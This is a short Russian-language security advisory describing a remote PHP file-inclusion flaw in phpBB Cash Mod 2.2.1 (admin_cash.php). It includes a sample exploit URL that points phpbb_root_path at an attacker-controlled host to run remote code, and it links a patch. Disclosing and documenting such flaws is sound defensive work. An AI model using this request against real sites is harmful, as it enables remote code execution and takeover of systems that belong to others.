php инклудинг в phpBB
| Дата публикации: | 19.11.2004 |
| Дата изменения: | 20.10.2006 |
| Всего просмотров: | 4599 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: phpBB Cash Mod 2.2.1
Описание: Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример: http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/ URL производителя: xore.ca/viewforum.php?f=2 Решение: Установите обновление: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=539420 |
|
| Ссылки: | phpBB Cash Mod Include File Error Lets Remote Users Execute Arbitrary Code |